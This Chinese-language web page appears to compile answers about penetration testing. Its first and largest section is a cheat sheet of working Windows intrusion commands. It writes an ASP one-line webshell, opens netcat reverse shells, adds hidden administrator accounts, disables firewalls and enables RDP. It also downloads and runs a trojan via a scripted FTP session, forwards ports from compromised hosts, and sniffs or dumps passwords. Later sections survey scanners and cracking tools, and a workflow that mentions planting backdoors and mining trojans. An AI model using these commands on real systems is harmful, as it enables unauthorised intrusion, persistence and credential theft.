㈠ 常用的windows滲透命令有哪些
echo ^<%eval request(「#」)%^> >C:\wmpub\hkfe666\h4ck.asp
Md hack 創建hack文件夾
本地nc -vv -p -l 埠
伺服器 nc路徑 -e cmd路徑 ip 埠
Rd hack 刪除hack文件夾
Type d:\wwwroot\hack.asp 查看一句話木馬的內容
Del d:\wwwroot\hack.asp 刪除hack.asp
Dir c:\ 查看c盤根目錄全部文件夾和文件信息
Tree e:\ 顯示e盤文件目錄樹
reg query 「HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp」 /v portnumber
查看終端確定為3389?
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server 看看fDenyTSConnections的鍵值是多少?值為0是開,為1是關
netstat -ano 能看到3389開啟?
net stop policyagent
net stop sharedaccess
/c dir d:\freehost\weiquanguang\cnhonker*.* /w/o/s
先net stop sharedacess關閉防火,再net stop PolicyAgent關閉篩選
administrator默認被允許,這種情況下,你需將用戶同時加入「Remote Desktop Users」組。
net user xxx pppp /add &net localgroup administrators xxx /add
net localgroup administrators xxx /add
net localgroup 「Remote Desktop Users」 xxx /add 遠程桌面用戶允許設置。
gpedit.msc
常用系統小命令
gpedit.msc計算機組策略
compmgmt.msc計算機管理
devmgmt.msc設備管理
diskmgmt.msc磁碟管理
fsmgmt.msc共享管理
lusrmgr.ms本地用戶管理
notepad寫字板write
services.msc服務管理
開啟 telnet
@echo off
sc config tlntsvr start= auto
net start telnet
在CMD模式下結束某一進程
一: 通過tasklist 可以查找到相關進程的PID。
語法:tasklist /svc 通過taskkill pid 可以關掉進程。 語法: taskkill /im 進程名 /f
二: ntsd -c q -p PID 可以強行結束運行進程
zxarps.exe -idx 0 -ip 目標的IP -port 80,21,3389 -logfilter 「+post,+user,+pass」
dialupass /allusers /stext 「c:\1.txt」
========================================================
query user查詢登陸用戶
logoffID蹬出某用戶
net user 查看所有用戶
c:\xp3389.exe -a
net user 1 1 /add
net1 localgroup administrators 1 /add
C:\>net1 user guest /active:yes 啟用該用戶
=========================================================
whoami 查看全系統許可權
調系統許可權
C:\>c:\windows\system32\cacls.exe c:\windows\system32\net.exe /t /e /g everyone:f
==========================================================
FTP命令行下加賬號的命令;很爽。。。
C:\>ftp
ftp> open 192.168.0.22
ftp> quote site exec net.exe user admin$ jinwei58 /add
ftp> quote site exec net.exe localgroup admin$ /add
200 EXEC command successful (TID=33).
============================================================
ftp傳馬命令
echo open 自己的FTP > cmd.txt
echo 帳戶>> cmd.txt
echo 密碼>> cmd.txt
echo binary >> cmd.txt
echo get 木馬.exe >> cmd.txt
echo bye >> cmd.txt
ftp -s:cmd.txt
木馬.exe
木馬.exe
del cmd.txt. /q
==============================================================
quote site exec net user 用戶名 密碼 /add 添加用戶
quote site exec net localgroup administrators 用戶名 /add
tasklist \svc //shell列進程
==============================================================
sql語句加管理用戶
Select MyCmd(「net user」);
select state(「net user」)
select cmdshell(「net user」)
==============================================================
netstat -an
1.查詢終端開放埠
netstat -an | find 「3389″
================================================================
查詢終端3389埠
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal」 「Server\WinStations\RDP-Tcp /v PortNumber
================================================================
2.開啟2003終端
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal」 「Server /v fDenyTSConnections /t REG_Dword /d 00000000 /f
================================================================
3.更改終端埠為2008(0x7d8)
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal」 「Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x7d8 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal」 「Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x7D8 /f
=================================================================
4.取消xp&2003系統防火牆對終端服務的限制及IP連接的限制
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled:@xpsp2res.dll,-22009 /f
=================================================================
5.開啟Win2000的終端 (需重啟)
先將開啟終端的工具上傳到目標主機的c:\
然後執行c:\ver3389.exe等待系統重啟就可以了
=====================================================================
6.解決終端超出了最大連接數的命令
mstsc /v:ip:3389 /console
=====================================================================
關閉防火牆
net stop sharedaccess
======================================================================
先將雙開3389的工具上傳到目標主機下的c:\
然後運行命令 c:\3389.exe
======================================================================
Tasklist/SVC >>c:\3389.txt
=====================================================================
查看adsl
Dialupass.exe /allusers /stext 「c:\1.txt」
=====================================================================
埠映射篇之lcx使用方法
Lcx 命令
本機運行lcx.exe -listen 3001 3002
c:\lcx.exe -slave 61.184.188.125 3001 肉雞的內網IP 3389
C:\recycler\lcx.exe -slave 121.61.225.211 3001 192.170.0.23 3389
在本機連接: 127.0.0.1:3002
=====================================================================
這里是nc的命令說明:
2.nc反彈提權:
伺服器執行: nc位置 -l -p 8080 -t -e cmd位置
監聽本地入棧信息
NC地址 cmd地址
————————————————— -p port 打開本地埠
本地執行: telnet + 伺服器IP地址 + 446
————————————————— -t 以telnet形式應答入棧請求
傳馬命令: tftp -i ip地址 get 木馬名字.exe -e 程序重定向
額外:傳個NC到Webshell上去,反彈個shell,然後用htran轉發埠數據,接著在本地嗅探。
2.降低運行許可權
////////////////////////////
現在本地監聽一個埠。
nc -vv -l -p 8080
最好是80或8080這樣的埠,被防火牆攔截的幾率小很多。
在WebShell運行下面命令連接我們監聽的埠得到CmdShell:
nc -vv IP 8080 -e C:\Documents and Settings\All Users\Documents\cmd.exe
—-===============================================================
1.查詢終端埠
xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal」 「Server\WinStations\RDP-Tcp /v PortNumber
通用:regedit /e tsp.reg 「HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp」
type tsp.reg
2.開啟XP&2003終端服務
HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber\
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal」 「Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
3.更改終端埠為20008(0x4E28)
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal」 「Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal」 「Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
4.取消xp&2003系統防火牆對終端服務3389埠的限制及IP連接的限制
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 40404:TCP /t REG_SZ /d 40404:TCP:*:Enabled:@xpsp2res.dll,-22009 /f
5.開啟Win2000的終端,埠為3389(需重啟)
echo Windows Registry Editor Version 5.00 >2000.reg
echo. >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
echo 「Enabled」=」0″ >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
echo 「ShutdownWithoutLogon」=」0″ >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
echo 「EnableAdminTSRemote」=dword:00000001 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
echo 「TSEnabled」=dword:00000001 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
echo 「Start」=dword:00000002 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
echo 「Start」=dword:00000002 >>2000.reg
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
echo 「Hotkey」=」1″ >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
echo 「PortNumber」=dword:00000D3D >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
echo 「PortNumber」=dword:00000D3D >>2000.reg
6.強行重啟Win2000&Win2003系統(執行完最後一條一句後自動重啟)
@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
(set inf=InstallHinfSection DefaultInstall)
echo signature=$chicago$ >> restart.inf
echo [defaultinstall] >> restart.inf
rundll32 setupapi,%inf% 1 %temp%\restart.inf
7.禁用TCP/IP埠篩選 (需重啟)
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
8.終端超出最大連接數時可用下面的命令來連接
mstsc /v:ip:3389 /console
9.調整NTFS分區許可權
cacls c: /e /t /g everyone:F (所有人對c盤都有一切權利)
cacls %systemroot%\system32\*.exe /d everyone (拒絕所有人訪問system32中exe文件)
來自文章《windows下面常用的滲透測試命令》
㈡ 滲透測試工具的通用漏洞檢測
在獲取了目標主機的操作系統、開放埠等基本信息後,通常利用通用漏洞掃描工具檢測目標系統所存在的漏洞和弱口令。通用漏洞主要指操作系統本身或者安裝的應用軟體所存在的漏洞,通常是指緩沖區漏洞,例如MS-08-067、oracle的漏洞。由於系統開啟了135、139、445、1433、1521等應用程序埠,同時沒有及時安裝補丁,使得外來主機可以通過相應的埠發送惡意的請求從而獲取不應當獲得的系統許可權。在實際的應用中,如果防火牆做了良好的部署,則對外界展現的埠應該受到嚴格控制,相應的通用漏洞危害較小。但是如果沒有在邊界上進行良好的訪問控制,則緩沖區溢出漏洞有著極其嚴重的威脅,會輕易被惡意用戶利用獲得伺服器的最高許可權。 X-Scan 是一款國產的漏洞掃描軟體,完全免費,無需安裝,由國內著名民間黑客組織「安全焦點」完成。X-Scan的功能包括:開放服務、操作系統鑒別、應用系統弱口令、IIS編碼漏洞、應用漏洞檢測等。
X-Scan通常被用來進行弱口令的檢測,其提供的弱口令檢測模塊包含telnet、ftp、SQL-server、cvs、vnc、smtp、nntp、sock5、imap、pop3、rexec、NT-Server、ssh、www,採用字典攻擊的方式,配合恰當的字典生成工具可以完成大部分常用應用軟體的弱口令破解工作。X-Scan也提供漏洞檢測腳本的載入方式,可以即時的更新掃描模塊,同時也提供掃描結果報告功能。 Metasploit 是一款開源的安全漏洞檢測工具,可以幫助安全和IT專業人士識別安全性問題,驗證漏洞的緩解措施,並管理專家驅動的安全性進行評估,提供真正的安全風險情報。
事實上Metasploit提供的是一個通用的漏洞攻擊框架,通過它可以方便的獲取、開發針對漏洞的攻擊。Metasploit將負載控制,編碼器,無操作生成器和漏洞整合在一起,成為一種研究高危漏洞的途徑,它集成了各平台上常見的溢出漏洞和流行的 shellcode ,並且不斷更新。對於開發者來說,需要了解緩沖區溢出的原理、需要編寫的漏洞詳細情況、payload生成、注入點以及metasploit的漏洞編寫規則。而對於普通的滲透測試人員,僅僅只需要安裝metasploit,下載最新的漏洞庫和shellcode,選擇攻擊目標,發送測試就可以完成漏洞檢測工作。事實上,metasploit不僅提供漏洞檢測,還可以進行實際的入侵工作。由於採用入侵腳本時可能對系統造成不可預估的效果,在進行滲透測試時應當僅僅使用測試功能。
Acunetix Web Vulnerability Scanner
Acunetix Web Vulnerability Scanner是一個網站及
伺服器漏洞掃描軟體,它包含有收費和免費兩種版本。
功能介紹:
1、AcuSensor 技術
2、自動的客戶端腳本分析器,允許對 Ajax 和 Web 2.0 應用程序進行安全性測試。
3、業內最先進且深入的 SQL 注入和跨站腳本測試
4、高級滲透測試工具,例如 HTTP Editor 和 HTTP Fuzzer
5、可視化宏記錄器幫助您輕松測試 web 表格和受密碼保護的區域
6、支持含有 CAPTHCA 的頁面,單個開始指令和 Two Factor(雙因素)驗證機制
7、豐富的報告功能,包括 VISA PCI 依從性報告
8、高速的多線程掃描器輕松檢索成千上萬個頁面
9、智能爬行程序檢測 web 伺服器類型和應用程序語言
10、Acunetix 檢索並分析網站,包括 flash 內容、SOAP 和 AJAX
11、埠掃描 web 伺服器並對在伺服器上運行的網路服務執行安全檢查
㈢ 一個完整的滲透測試流程,分為那幾塊,每一塊有哪些內容
包含以下幾個流程:
信息收集
第一步做的就是信息收集,根據網站URL可以查出一系列關於該網站的信息。通過URL我們可以查到該網站的IP、該網站操作系統、腳本語言、在該伺服器上是否還有其他網站等等一些列的信息。
漏洞探測
當我們收集到了足夠多的信息之後,我們就要開始對網站進行漏洞探測了。探測網站是否存在一些常見的Web漏洞,比如:SQL注入 。
漏洞利用
探測到了該網站存在漏洞之後,就要對該漏洞進行利用了。不同的漏洞有不同的利用工具,很多時候,通過一個漏洞我們很難拿到網站的webshell,我們往往需要結合幾個漏洞來拿webshell。
內網滲透
當我們能跟內網主機進行通信後,我們就要開始進行內網滲透了。可以先使用nmap對內網主機進行掃描,探測在線的主機,並且探測其使用的操作系統、開放的埠等信息。
內網中也有可能存在供內網使用的內網伺服器,可以進一步滲透拿下其許可權。
痕跡清除
達到了目的之後,有時候只是為了黑入網站掛黑頁,炫耀一下;或者在網站留下一個後門,作為肉雞,沒事的時候上去溜達溜達;亦或者掛入挖礦木馬。
撰寫滲透測試保告
在完成了滲透測試之後,就需要對這次滲透測試撰寫滲透測試報告了。明確的寫出哪裡存在漏洞,以及漏洞修補的方法。以便於網站管理員根據我們的滲透測試報告修補這些漏洞和風險,防止被黑客攻擊。
㈣ 滲透測試工具有哪些
1、Kali Linux
不使用Kali Linux作為基本滲透測試操作系統,算不上真正的黑客。Kali Linux是基於Debian的Linux發行版,
設計用於數字取證操作系統。每一季度更新一次。由Offensive Security Ltd維護和資助。最先由Offensive Security的Mati
Aharoni和Devon Kearns通過重寫BackTrack來完成,BackTrack是他們之前寫的用於取證的Linux發行版 。
Kali Linux的前身是BackTrack
Linux,有進攻性安全部門的專業人士維護,它在各個方面都進行了優化,可以作為進攻性滲透測試工具使用。
2、Nmap
Nmap是發現企業網路中任何類型的弱點或漏洞的絕佳工具,它也是審計的很好工具。該工具的作用是獲取原始數據包並確定哪些主機在網路的特定段上可用,正在使用什麼操作系統,以及識別特定主機的數據包防火牆或過濾器的不同類型和版本正在使用。Nmap對滲透測試過程的任何階段都很有用並且還是免費的。
3、Wireshark
Wireshark是一個無處不在的工具,可用於了解通過網路的流量。雖然通常用於深入了解日常TCP/IP連接問題,但Wireshark支持對數百種協議的分析,包括對其中許多協議的實時分析和解密支持。如果不熟悉滲透測試,Wireshark是一個必須學習的工具。
4、John the Ripper
John the
Ripper是一個很流行的密碼破解工具,是滲透測試工具包中的一個很必要的補充。它可以用來確定資料庫中的未知弱點,通過從傳統字典中找到的復雜和流行的單詞列表,獲取文本字元樣本,並用與正在生成的密碼相同的格式,對其進行加密來達到目的。
5、Hashcat
Hashcat自稱世界上最快和最先進的密碼恢復應用程序,可能並不是謙虛,懂Hashcat的人肯定知道它的價值。Hashcat讓John the
Ripper一籌莫展。它是破解哈希的首選滲透測試工具,Hashcat支持多種密碼猜測暴力攻擊,包括字典和掩碼攻擊。
6、Hydra
Hydra在需要在線破解密碼時發揮作用,例如SSH或FTP登錄、IMAP、IRC、RDP等等。將Hydra指向你想破解的服務,如果你願意,可以給它傳遞一個單詞列表,然後扣動扳機。像Hydra這樣的工具提醒人們為什麼限制密碼嘗試和在幾次登錄嘗試後斷開用戶連接可以成功地防禦攻擊者。
7、Sqlmap
Sqlmap,是非常有效的開源的SQL注入工具,並且自動化檢測和利用SQL注入缺陷並接管資料庫伺服器的過程,就像它的網站所說的那樣。Sqlmap支持所有常用目標,包括MySQL、oracle、PostgreSQL、Microsoft
SQL、server等。